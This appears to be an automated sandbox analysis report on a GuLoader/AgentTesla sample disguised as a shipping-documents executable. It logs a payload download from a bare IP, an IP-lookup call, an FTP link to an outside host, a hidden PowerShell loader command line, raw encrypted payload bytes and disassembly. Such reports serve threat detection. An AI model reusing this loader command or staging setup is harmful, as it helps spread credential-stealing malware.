                                      Sep 25, 2024 16:00:09.196199894 CEST44349721104.26.13.205192.168.2.6
                                      Sep 25, 2024 16:00:09.196245909 CEST44349721104.26.13.205192.168.2.6
                                      Sep 25, 2024 16:00:09.196366072 CEST49721443192.168.2.6104.26.13.205
                                      Sep 25, 2024 16:00:09.200490952 CEST49721443192.168.2.6104.26.13.205
                                      Sep 25, 2024 16:00:10.607628107 CEST4972221192.168.2.6192.185.13.234
                                      Sep 25, 2024 16:00:10.612454891 CEST2149722192.185.13.234192.168.2.6
                                      Sep 25, 2024 16:00:10.612524986 CEST4972221192.168.2.6192.185.13.234
                                      Sep 25, 2024 16:00:10.615166903 CEST4972221192.168.2.6192.185.13.234
                                      Sep 25, 2024 16:00:10.620038986 CEST2149722192.185.13.234192.168.2.6
                                      Sep 25, 2024 16:00:10.620094061 CEST4972221192.168.2.6192.185.13.234

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Sep 25, 2024 16:00:08.488486052 CEST5036053192.168.2.61.1.1.1
                                      Sep 25, 2024 16:00:08.496692896 CEST53503601.1.1.1192.168.2.6
                                      Sep 25, 2024 16:00:10.289800882 CEST5863653192.168.2.61.1.1.1
                                      Sep 25, 2024 16:00:10.605891943 CEST53586361.1.1.1192.168.2.6

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Sep 25, 2024 16:00:08.488486052 CEST192.168.2.61.1.1.10xf2deStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                      Sep 25, 2024 16:00:10.289800882 CEST192.168.2.61.1.1.10x5671Standard query (0)ftp.concaribe.comA (IP address)IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Sep 25, 2024 16:00:08.496692896 CEST1.1.1.1192.168.2.60xf2deNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                      Sep 25, 2024 16:00:08.496692896 CEST1.1.1.1192.168.2.60xf2deNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                      Sep 25, 2024 16:00:08.496692896 CEST1.1.1.1192.168.2.60xf2deNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                      Sep 25, 2024 16:00:10.605891943 CEST1.1.1.1192.168.2.60x5671No error (0)ftp.concaribe.comconcaribe.comCNAME (Canonical name)IN (0x0001)false
                                      Sep 25, 2024 16:00:10.605891943 CEST1.1.1.1192.168.2.60x5671No error (0)concaribe.com192.185.13.234A (IP address)IN (0x0001)false

                                      HTTP Request Dependency Graph

                                      • api.ipify.org
                                      • 185.29.11.53

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.649720185.29.11.53804232C:\Program Files (x86)\Windows Mail\wabmig.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 25, 2024 16:00:07.100620031 CEST172OUTGET /bgJJbKBK219.bin HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Host: 185.29.11.53
                                      Cache-Control: no-cache
                                      Sep 25, 2024 16:00:07.729650021 CEST1236INHTTP/1.1 200 OK
                                      Content-Type: application/octet-stream
                                      Last-Modified: Tue, 24 Sep 2024 22:11:29 GMT
                                      Accept-Ranges: bytes
                                      ETag: "b3ccbdb4ceedb1:0"
                                      Server: Microsoft-IIS/8.5
                                      Date: Wed, 25 Sep 2024 14:00:05 GMT
                                      Content-Length: 241728
                                      Data Raw: bb a1 07 e7 47 31 97 2f c7 92 21 83 72 74 d3 b1 24 84 a3 82 89 68 ad fa f8 7c dd 3e ad a7 b4 13 26 ad ff a6 db ad c2 5e b1 6c 71 e9 7c a6 c8 21 55 08 bd 78 8f 1a 25 84 75 f2 fa a4 b3 68 a7 d7 c8 0c ec 43 df 68 20 25 49 bb 97 6e a2 74 ac 90 cb ac 98 88 49 e7 55 82 f9 b3 d9 45 11 cd 7f 76 24 b4 7d c4 97 ed 1e 39 13 f8 db 1d 80 82 7e b3 36 a9 14 30 94 ed a8 07 e1 4a d9 0e 85 bc 9d 4c fd 27 94 08 c5 81 6f dc 97 7f 35 3c 0e d4 05 07 ad e4 8c c6 34 b0 f0 ae 19 c4 7a 34 9c fe 3b 66 40 31 5e 24 ae a3 01 f2 fd 5f 11 e4 d3 57 42 d2 f0 41 3e ab f2 66 bd 72 99 99 ee fc a4 a3 9f e6 ce 88 81 ea 9e 89 ff b2 87 82 df 54 77 e0 6b 72 4e 45 9e a1 df bf 48 54 04 a0 fd f3 de 4d be 91 bf 64 e6 95 f8 a0 e3 6e 4c 1c 62 f9 a6 8e 65 95 61 5c b2 60 b5 e9 30 66 40 7a 16 1b a1 05 79 10 f1 d5 b8 f8 32 84 e1 4c 82 2a 8f 3b fd 7a 6b fa 4e c5 07 a9 79 b1 b7 0b df f2 48 1b d7 ac 1c 0d 42 10 3d 32 56 1a 35 ac fd e6 c6 ce 3d 0c fa 19 e2 d5 52 0f 0b 6d 7a 52 54 5c 7b c8 3c 37 16 7b f0 52 c1 ad ff 03 11 ca 6c 2b ee 9a f1 6d b6 f6 92 ed [TRUNCATED]
                                      Data Ascii: G1/!rt$h|>&^lq|!Ux%uhCh %IntIUEv$}9~60JL'o5<4z4;f@1^$_WBA>frTwkrNEHTMdnLbea\`0f@zy2L*;zkNyHB=2V5=RmzRT\{<7{Rl+mvd!;OO^"Qj8VHxKSk?+JMCq#r@aKeXsC+]r,.g0YrDgn=9<,sviE5M UaG*1O.Q3iSB*pDwS^me1O`[\Db`^zPw(j?*4v=t~#:N]L(g<t[Cud^_6z`}h4CSJsE4f@HOCom*)h8\9N_2]"sIq4Z{U|_6*%bvv#^,Ng%@_clpc^]w@^Nm3^1O${YC&}5 %?$rkIigoz=rlzD[,LpnAr.hTX(l-j6?w.2h2mt-a>@}M<!ux60$nZ/Wv-JnVQ
                                      Sep 25, 2024 16:00:07.729682922 CEST1236INData Raw: b3 15 67 3c f0 20 48 e8 c7 4a 72 b1 ac 62 55 63 d6 3e f2 ff d5 24 e4 52 fb 17 02 9d 8b 72 c7 c5 f0 4e 9c f2 c8 f2 85 c1 d5 70 cb 68 cb d2 67 28 5a c2 be c7 0e ab e0 d6 0b 65 54 b1 ab cb 53 df f9 87 6b bf 0c 5c fc 84 6a 35 9e 1f 6b 9d 42 72 79 67
                                      Data Ascii: g< HJrbUc>$RrNphg(ZeTSk\j5kBrygqVAV|Ch!'NfUsZU1{1}H9Kz7`K{LEL1d94zi5~;W6jKA^5:ax]`qI2s4dD
                                      Sep 25, 2024 16:00:07.729718924 CEST1236INData Raw: 04 78 cc df 16 27 78 bd 9d c4 b6 a6 8b 8c e6 9e c7 83 98 c9 a8 fc c2 53 80 ff 32 71 ca 75 70 35 dd 9e a1 3b 95 68 57 0c dc 6e f3 de ef 97 db bd 44 f5 95 f8 aa e1 1c 25 f8 61 89 8e 43 65 95 67 96 af 62 ce 70 70 66 44 70 34 19 a2 7a e0 10 f5 d1 92
                                      Data Ascii: x'xS2qup5;hWnD%aCegbppfDp4z0L IXkfhH~Am2V=kR3zRRveG{`~l@tKI-Q%Q@ULPXQ:?+`SC[!q=c9Be([
                                      Sep 25, 2024 16:00:07.729733944 CEST672INData Raw: 4d 96 ab aa e2 43 ee f1 09 23 72 44 26 ed 8b 6d 42 f2 61 f4 80 d1 e8 f6 7a 99 cb c3 61 72 6d 9e af 64 43 2b 18 2f 94 7f a3 c7 41 e1 ef 0a 93 0a 87 97 03 fb f6 81 d8 da 15 f9 1e 7b fc 2c 2c 77 ef 8a 6a 5b 2e a9 af 39 46 32 e3 26 c1 a1 ee 76 6e a1
                                      Data Ascii: MC#rD&mBazarmdC+/A{,,wj[.9F2&vnpyELH;G+(QGwvmV5 -Z| ,NC^R*zFtuR\E3J,ZZFJ=bWrur|n,U1Vjj=(vv}^{P_7
                                      Sep 25, 2024 16:00:07.729751110 CEST1236INData Raw: 21 f9 03 e9 3b 71 57 93 e5 0c 5b fe 42 40 f3 62 04 1e 1a c0 60 ba 32 85 94 f3 4f d4 99 aa bc 2e e9 8f 4e 26 92 a1 09 21 25 49 b9 95 15 3c 8a ac 94 6b f4 49 f5 2b e6 55 86 bb b0 f1 6f 13 cd 75 0b 47 b5 7d c0 bd ed 1e 39 10 c8 d8 1d 75 82 7e b3 37
                                      Data Ascii: !;qW[B@b`2O.N&!%I<kI+UouG}9u~7!|L8.5f14p=hRKZWD4(tEq.^k|xi2krN?IUDjae`pf@"y8L*q5zkB
                                      Sep 25, 2024 16:00:07.729763985 CEST224INData Raw: 61 9c b0 60 b5 e9 0e 63 40 5a 12 69 a8 07 79 60 87 d8 b8 f8 42 eb f4 4c 86 20 2d c5 f1 7b 6b da 4c e5 03 a9 0b a2 b7 0b af 50 b6 17 d4 ac 7c 8b 42 10 2d 1a 40 0a 35 a6 03 e8 d4 ce c3 11 f8 19 90 c0 52 0f 6b 45 6d 52 54 56 d9 36 30 36 16 5b 60 97
                                      Data Ascii: a`c@Ziy`BL -{kLP|B-@5RkEmRTV606[``ih|!KIC^Q`JVaHkIK_;k5.JMkB#Laexr=.Pc,(]^Ug0X
                                      Sep 25, 2024 16:00:07.811039925 CEST1236INData Raw: ee 5a 52 bf d5 01 5a df cd 0a 10 6a 4a e8 ea 80 13 a5 aa 89 e6 39 3c ff 0c 2e 20 ed 73 65 15 e6 a9 9b 04 0a ba bd f0 10 bb e3 36 f2 df 90 4d c1 2a dd 96 55 21 a4 fe 0e dd 58 52 10 29 86 c6 5c ec 51 0f 0f ec 2e f5 02 96 80 7a 8e aa fb 9c a8 cd 70
                                      Data Ascii: ZRZjJ9<. se6M*U!XR)\Q.zpDQS[m%z1Nn^HBw]!Z2}QyejI*>,=T|#zm:N-zg65'>q[cqd^6btts5xIqzG}^CQCb6"H,
                                      Sep 25, 2024 16:00:07.811064959 CEST1236INData Raw: 88 d8 b7 7c 55 fa fe 73 3c 42 84 fc e9 48 bc 7f fd fa a5 03 c6 bc 6f 10 e4 dd b2 4e 18 2c b9 9e 39 b4 be 02 f9 a7 ad 07 bc 3b b3 bd e3 1b a9 39 22 16 57 85 06 33 25 75 4f 97 e5 cc 53 20 9e 6c 80 5b a8 12 0b 87 cb e7 49 6c 2a bf bb 5b 37 8b 47 95
                                      Data Ascii: |Us<BHoN,9;9"W3%uOS l[Il*[7GfRTcR"b3pyl1Q\n8oX8s'U`%gQ+ED9cGsb$W$azjzq=x,aoDL,aP.TXk\Ub
                                      Sep 25, 2024 16:00:07.811081886 CEST448INData Raw: 8d 44 ef a1 7b 23 c8 8b 4c fd 36 fc 04 40 a8 9e c4 2e 8c 6a 54 58 64 92 9b aa a6 5c 83 09 87 82 48 9b 1d de fd 67 97 42 f7 06 30 12 81 78 56 60 47 cf e2 ff c9 76 72 b4 9a ef f2 a9 bd f9 70 a3 e3 31 fd 3b 05 5f aa f3 28 93 e2 0e 95 7b 26 9d 4f 56
                                      Data Ascii: D{#L6@.jTXd\HgB0xV`Gvrp1;_({&OV+O.GwxV7o8,eo'y$GUgDx pRnpK.gWBG*YeJS?,q= $=)VBp %MEo]sI_ E3qu$
                                      Sep 25, 2024 16:00:07.811098099 CEST1236INData Raw: 1e e2 d5 56 7d 50 6f 7a 22 7c 41 7b c8 36 c9 18 7b 64 b7 d6 ad a8 03 ef c4 6f cb ed 64 bb 6b b6 d6 98 ed 76 64 5c 20 35 23 fc fc d4 f9 43 06 4f de 56 22 c1 51 9e 25 3a fa 26 30 31 b7 07 48 fd 26 f5 7b 4b c5 74 b9 50 a7 e3 15 bf 6b 9d c1 8b 12 c3
                                      Data Ascii: V}Poz"|A{6{dodkvd\ 5#COV"Q%:&01H&{KtPkJM}Cu#r2gf2fK=i[sC+e4gXC,(D2[_K\ZgNS?pEvIM?,u(XT ,W_3bjM)P
                                      Sep 25, 2024 16:00:07.811114073 CEST1236INData Raw: a0 a0 f9 55 25 a6 b0 04 dd 28 7c ae 20 86 cc ae 81 51 0f 7b b6 55 f6 02 ec 80 29 8c aa f7 c1 3b cd 70 40 05 95 94 53 71 93 1e f2 6d 2f 77 cc bb 31 4b 76 f1 59 f3 2c 6c c3 95 62 df 61 ea ba 60 5d 05 3b 9b 83 68 94 5e c7 7a e5 02 ab ac 97 c7 24 fd
                                      Data Ascii: U%(| Q{U);p@Sqm/w1KvY,lba`];h^z$#iw?hj3%*0M\?#:NY>PH$w[3}^-P5bv:Jq G<HGFsbH(~;YH7$3Ubf6][?{05k


                                      HTTPS Proxied Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.649721104.26.13.2054434232C:\Program Files (x86)\Windows Mail\wabmig.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-25 14:00:09 UTC155OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                      Host: api.ipify.org
                                      Connection: Keep-Alive
                                      2024-09-25 14:00:09 UTC211INHTTP/1.1 200 OK
                                      Date: Wed, 25 Sep 2024 14:00:09 GMT
                                      Content-Type: text/plain
                                      Content-Length: 11
                                      Connection: close
                                      Vary: Origin
                                      CF-Cache-Status: DYNAMIC
                                      Server: cloudflare
                                      CF-RAY: 8c8b89f108514345-EWR
                                      2024-09-25 14:00:09 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                      Data Ascii: 8.46.123.33


                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:09:59:02
                                      Start date:25/09/2024
                                      Path:C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe"
                                      Imagebase:0x400000
                                      File size:729'960 bytes
                                      MD5 hash:4ECAFA8F623606CAF0A925F5C6B2EB10
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:2
                                      Start time:09:59:03
                                      Start date:25/09/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"powershell.exe" -windowstyle minimized "$Nanometre76=Get-Content 'C:\Users\user\AppData\Local\acneform\Baroco\Tarsometatarsal.Pla';$Hulhedernes=$Nanometre76.SubString(27962,3);.$Hulhedernes($Nanometre76)"
                                      Imagebase:0x780000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2780799795.00000000094D7000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:3
                                      Start time:09:59:03
                                      Start date:25/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff66e660000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:8
                                      Start time:09:59:54
                                      Start date:25/09/2024
                                      Path:C:\Program Files (x86)\Windows Mail\wabmig.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\windows mail\wabmig.exe"
                                      Imagebase:0x870000
                                      File size:66'048 bytes
                                      MD5 hash:BBC90B164F1D84DEDC1DC30F290EC5F6
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3394310610.00000000241CC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.3394310610.00000000241A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3394310610.00000000241A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000002.3376516352.0000000004687000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:moderate
                                      Has exited:false

                                      Disassembly

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:25.3%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:20.3%
                                        Total number of Nodes:1466
                                        Total number of Limit Nodes:48
                                        execution_graph 4234 404f43 GetDlgItem GetDlgItem 4235 404f95 7 API calls 4234->4235 4243 4051ba 4234->4243 4236 40503c DeleteObject 4235->4236 4237 40502f SendMessageW 4235->4237 4238 405045 4236->4238 4237->4236 4239 40507c 4238->4239 4244 406594 21 API calls 4238->4244 4241 4044d6 22 API calls 4239->4241 4240 40529c 4242 405348 4240->4242 4247 4051ad 4240->4247 4253 4052f5 SendMessageW 4240->4253 4246 405090 4241->4246 4248 405352 SendMessageW 4242->4248 4249 40535a 4242->4249 4243->4240 4268 405229 4243->4268 4288 404e91 SendMessageW 4243->4288 4245 40505e SendMessageW SendMessageW 4244->4245 4245->4238 4252 4044d6 22 API calls 4246->4252 4250 40453d 8 API calls 4247->4250 4248->4249 4256 405373 4249->4256 4257 40536c ImageList_Destroy 4249->4257 4264 405383 4249->4264 4255 405549 4250->4255 4269 4050a1 4252->4269 4253->4247 4259 40530a SendMessageW 4253->4259 4254 40528e SendMessageW 4254->4240 4260 40537c GlobalFree 4256->4260 4256->4264 4257->4256 4258 4054fd 4258->4247 4265 40550f ShowWindow GetDlgItem ShowWindow 4258->4265 4262 40531d 4259->4262 4260->4264 4261 40517c GetWindowLongW SetWindowLongW 4263 405195 4261->4263 4273 40532e SendMessageW 4262->4273 4266 4051b2 4263->4266 4267 40519a ShowWindow 4263->4267 4264->4258 4281 4053be 4264->4281 4293 404f11 4264->4293 4265->4247 4287 40450b SendMessageW 4266->4287 4286 40450b SendMessageW 4267->4286 4268->4240 4268->4254 4269->4261 4272 4050f4 SendMessageW 4269->4272 4274 405177 4269->4274 4275 405132 SendMessageW 4269->4275 4276 405146 SendMessageW 4269->4276 4272->4269 4273->4242 4274->4261 4274->4263 4275->4269 4276->4269 4278 4054c8 4279 4054d3 InvalidateRect 4278->4279 4283 4054df 4278->4283 4279->4283 4280 4053ec SendMessageW 4282 405402 4280->4282 4281->4280 4281->4282 4282->4278 4284 405476 SendMessageW SendMessageW 4282->4284 4283->4258 4302 404e4c 4283->4302 4284->4282 4286->4247 4287->4243 4289 404ef0 SendMessageW 4288->4289 4290 404eb4 GetMessagePos ScreenToClient SendMessageW 4288->4290 4291 404ee8 4289->4291 4290->4291 4292 404eed 4290->4292 4291->4268 4292->4289 4305 406557 lstrcpynW 4293->4305 4295 404f24 4306 40649e wsprintfW 4295->4306 4297 404f2e 4298 40140b 2 API calls 4297->4298 4299 404f37 4298->4299 4307 406557 lstrcpynW 4299->4307 4301 404f3e 4301->4281 4308 404d83 4302->4308 4304 404e61 4304->4258 4305->4295 4306->4297 4307->4301 4311 404d9c 4308->4311 4309 406594 21 API calls 4310 404e00 4309->4310 4312 406594 21 API calls 4310->4312 4311->4309 4313 404e0b 4312->4313 4314 406594 21 API calls 4313->4314 4315 404e21 lstrlenW wsprintfW SetDlgItemTextW 4314->4315 4315->4304 4316 402643 4317 402672 4316->4317 4318 402657 4316->4318 4320 4026a2 4317->4320 4321 402677 4317->4321 4319 402d89 21 API calls 4318->4319 4330 40265e 4319->4330 4323 402dab 21 API calls 4320->4323 4322 402dab 21 API calls 4321->4322 4324 40267e 4322->4324 4325 4026a9 lstrlenW 4323->4325 4333 406579 WideCharToMultiByte 4324->4333 4325->4330 4327 402692 lstrlenA 4327->4330 4328 4026d6 4329 4026ec 4328->4329 4331 4060f9 WriteFile 4328->4331 4330->4328 4330->4329 4334 406128 SetFilePointer 4330->4334 4331->4329 4333->4327 4335 40615c 4334->4335 4336 406144 4334->4336 4335->4328 4337 4060ca ReadFile 4336->4337 4338 406150 4337->4338 4338->4335 4339 406165 SetFilePointer 4338->4339 4340 40618d SetFilePointer 4338->4340 4339->4340 4341 406170 4339->4341 4340->4335 4342 4060f9 WriteFile 4341->4342 4342->4335 3329 4015c6 3330 402dab 21 API calls 3329->3330 3331 4015cd 3330->3331 3348 405ed1 CharNextW CharNextW 3331->3348 3333 401636 3335 401668 3333->3335 3336 40163b 3333->3336 3334 405e53 CharNextW 3337 4015d6 3334->3337 3340 401423 28 API calls 3335->3340 3360 401423 3336->3360 3337->3333 3337->3334 3346 40161c GetFileAttributesW 3337->3346 3354 405b22 3337->3354 3357 405aab CreateDirectoryW 3337->3357 3364 405b05 CreateDirectoryW 3337->3364 3345 401660 3340->3345 3344 40164f SetCurrentDirectoryW 3344->3345 3346->3337 3349 405eee 3348->3349 3353 405f00 3348->3353 3351 405efb CharNextW 3349->3351 3349->3353 3350 405f24 3350->3337 3351->3350 3352 405e53 CharNextW 3352->3353 3353->3350 3353->3352 3355 40694b 5 API calls 3354->3355 3356 405b29 3355->3356 3356->3337 3358 405af7 3357->3358 3359 405afb GetLastError 3357->3359 3358->3337 3359->3358 3361 4055dc 28 API calls 3360->3361 3362 401431 3361->3362 3363 406557 lstrcpynW 3362->3363 3363->3344 3365 405b15 3364->3365 3366 405b19 GetLastError 3364->3366 3365->3337 3366->3365 3367 401946 3368 401948 3367->3368 3369 402dab 21 API calls 3368->3369 3370 40194d 3369->3370 3373 405c63 3370->3373 3413 405f2e 3373->3413 3376 405ca2 3379 405dcd 3376->3379 3427 406557 lstrcpynW 3376->3427 3377 405c8b DeleteFileW 3378 401956 3377->3378 3379->3378 3386 4068b4 2 API calls 3379->3386 3381 405cc8 3382 405cdb 3381->3382 3383 405cce lstrcatW 3381->3383 3428 405e72 lstrlenW 3382->3428 3384 405ce1 3383->3384 3387 405cf1 lstrcatW 3384->3387 3388 405ce7 3384->3388 3389 405de7 3386->3389 3391 405cfc lstrlenW FindFirstFileW 3387->3391 3388->3387 3388->3391 3389->3378 3390 405deb 3389->3390 3445 405e26 lstrlenW CharPrevW 3390->3445 3393 405dc2 3391->3393 3394 405d1e 3391->3394 3393->3379 3396 405da5 FindNextFileW 3394->3396 3406 405c63 64 API calls 3394->3406 3408 4055dc 28 API calls 3394->3408 3411 4055dc 28 API calls 3394->3411 3432 406557 lstrcpynW 3394->3432 3433 405c1b 3394->3433 3441 406317 MoveFileExW 3394->3441 3396->3394 3400 405dbb FindClose 3396->3400 3397 405c1b 5 API calls 3399 405dfd 3397->3399 3401 405e17 3399->3401 3402 405e01 3399->3402 3400->3393 3404 4055dc 28 API calls 3401->3404 3402->3378 3405 4055dc 28 API calls 3402->3405 3404->3378 3407 405e0e 3405->3407 3406->3394 3409 406317 40 API calls 3407->3409 3408->3396 3410 405e15 3409->3410 3410->3378 3411->3394 3448 406557 lstrcpynW 3413->3448 3415 405f3f 3416 405ed1 4 API calls 3415->3416 3417 405f45 3416->3417 3418 405c83 3417->3418 3419 406805 5 API calls 3417->3419 3418->3376 3418->3377 3425 405f55 3419->3425 3420 405f86 lstrlenW 3421 405f91 3420->3421 3420->3425 3423 405e26 3 API calls 3421->3423 3422 4068b4 2 API calls 3422->3425 3424 405f96 GetFileAttributesW 3423->3424 3424->3418 3425->3418 3425->3420 3425->3422 3426 405e72 2 API calls 3425->3426 3426->3420 3427->3381 3429 405e80 3428->3429 3430 405e92 3429->3430 3431 405e86 CharPrevW 3429->3431 3430->3384 3431->3429 3431->3430 3432->3394 3449 406022 GetFileAttributesW 3433->3449 3436 405c48 3436->3394 3437 405c36 RemoveDirectoryW 3439 405c44 3437->3439 3438 405c3e DeleteFileW 3438->3439 3439->3436 3440 405c54 SetFileAttributesW 3439->3440 3440->3436 3442 406338 3441->3442 3443 40632b 3441->3443 3442->3394 3452 40619d 3443->3452 3446 405e42 lstrcatW 3445->3446 3447 405df1 3445->3447 3446->3447 3447->3397 3448->3415 3450 405c27 3449->3450 3451 406034 SetFileAttributesW 3449->3451 3450->3436 3450->3437 3450->3438 3451->3450 3453 4061f3 GetShortPathNameW 3452->3453 3454 4061cd 3452->3454 3456 406312 3453->3456 3457 406208 3453->3457 3479 406047 GetFileAttributesW CreateFileW 3454->3479 3456->3442 3457->3456 3459 406210 wsprintfA 3457->3459 3458 4061d7 CloseHandle GetShortPathNameW 3458->3456 3460 4061eb 3458->3460 3461 406594 21 API calls 3459->3461 3460->3453 3460->3456 3462 406238 3461->3462 3480 406047 GetFileAttributesW CreateFileW 3462->3480 3464 406245 3464->3456 3465 406254 GetFileSize GlobalAlloc 3464->3465 3466 406276 3465->3466 3467 40630b CloseHandle 3465->3467 3481 4060ca ReadFile 3466->3481 3467->3456 3472 406295 lstrcpyA 3475 4062b7 3472->3475 3473 4062a9 3474 405fac 4 API calls 3473->3474 3474->3475 3476 4062ee SetFilePointer 3475->3476 3488 4060f9 WriteFile 3476->3488 3479->3458 3480->3464 3482 4060e8 3481->3482 3482->3467 3483 405fac lstrlenA 3482->3483 3484 405fed lstrlenA 3483->3484 3485 405ff5 3484->3485 3486 405fc6 lstrcmpiA 3484->3486 3485->3472 3485->3473 3486->3485 3487 405fe4 CharNextA 3486->3487 3487->3484 3489 406117 GlobalFree 3488->3489 3489->3467 4343 404646 lstrlenW 4344 404665 4343->4344 4345 404667 WideCharToMultiByte 4343->4345 4344->4345 4346 4049c7 4347 4049f3 4346->4347 4348 404a04 4346->4348 4407 405b9b GetDlgItemTextW 4347->4407 4349 404a10 GetDlgItem 4348->4349 4356 404a6f 4348->4356 4352 404a24 4349->4352 4351 4049fe 4354 406805 5 API calls 4351->4354 4355 404a38 SetWindowTextW 4352->4355 4360 405ed1 4 API calls 4352->4360 4353 404b53 4357 404d02 4353->4357 4409 405b9b GetDlgItemTextW 4353->4409 4354->4348 4361 4044d6 22 API calls 4355->4361 4356->4353 4356->4357 4362 406594 21 API calls 4356->4362 4359 40453d 8 API calls 4357->4359 4364 404d16 4359->4364 4365 404a2e 4360->4365 4366 404a54 4361->4366 4367 404ae3 SHBrowseForFolderW 4362->4367 4363 404b83 4368 405f2e 18 API calls 4363->4368 4365->4355 4372 405e26 3 API calls 4365->4372 4369 4044d6 22 API calls 4366->4369 4367->4353 4370 404afb CoTaskMemFree 4367->4370 4371 404b89 4368->4371 4373 404a62 4369->4373 4374 405e26 3 API calls 4370->4374 4410 406557 lstrcpynW 4371->4410 4372->4355 4408 40450b SendMessageW 4373->4408 4376 404b08 4374->4376 4379 404b3f SetDlgItemTextW 4376->4379 4383 406594 21 API calls 4376->4383 4378 404a68 4381 40694b 5 API calls 4378->4381 4379->4353 4380 404ba0 4382 40694b 5 API calls 4380->4382 4381->4356 4390 404ba7 4382->4390 4384 404b27 lstrcmpiW 4383->4384 4384->4379 4386 404b38 lstrcatW 4384->4386 4385 404be8 4411 406557 lstrcpynW 4385->4411 4386->4379 4388 404bef 4389 405ed1 4 API calls 4388->4389 4391 404bf5 GetDiskFreeSpaceW 4389->4391 4390->4385 4394 405e72 2 API calls 4390->4394 4396 404c40 4390->4396 4393 404c19 MulDiv 4391->4393 4391->4396 4393->4396 4394->4390 4395 404cb1 4398 404cd4 4395->4398 4400 40140b 2 API calls 4395->4400 4396->4395 4397 404e4c 24 API calls 4396->4397 4399 404c9e 4397->4399 4412 4044f8 KiUserCallbackDispatcher 4398->4412 4401 404cb3 SetDlgItemTextW 4399->4401 4402 404ca3 4399->4402 4400->4398 4401->4395 4404 404d83 24 API calls 4402->4404 4404->4395 4405 404cf0 4405->4357 4413 404920 4405->4413 4407->4351 4408->4378 4409->4363 4410->4380 4411->4388 4412->4405 4414 404933 SendMessageW 4413->4414 4415 40492e 4413->4415 4414->4357 4415->4414 3490 401c48 3491 402d89 21 API calls 3490->3491 3492 401c4f 3491->3492 3493 402d89 21 API calls 3492->3493 3494 401c5c 3493->3494 3495 401c71 3494->3495 3496 402dab 21 API calls 3494->3496 3497 402dab 21 API calls 3495->3497 3501 401c81 3495->3501 3496->3495 3497->3501 3498 401cd8 3500 402dab 21 API calls 3498->3500 3499 401c8c 3502 402d89 21 API calls 3499->3502 3503 401cdd 3500->3503 3501->3498 3501->3499 3504 401c91 3502->3504 3505 402dab 21 API calls 3503->3505 3506 402d89 21 API calls 3504->3506 3508 401ce6 FindWindowExW 3505->3508 3507 401c9d 3506->3507 3509 401cc8 SendMessageW 3507->3509 3510 401caa SendMessageTimeoutW 3507->3510 3511 401d08 3508->3511 3509->3511 3510->3511 4416 4028c9 4417 4028cf 4416->4417 4418 4028d7 FindClose 4417->4418 4419 402c2f 4417->4419 4418->4419 3658 4014cb 3659 4055dc 28 API calls 3658->3659 3660 4014d2 3659->3660 4420 6fe81b67 GetCommandLineW lstrcpynW 4421 6fe81bba 4420->4421 4422 6fe81bd9 4421->4422 4424 6fe818cc CharNextW 4421->4424 4423 6fe818cc CharNextW 4422->4423 4425 6fe81bdf CreateProcessW 4423->4425 4424->4421 4427 6fe81c10 WaitForSingleObject 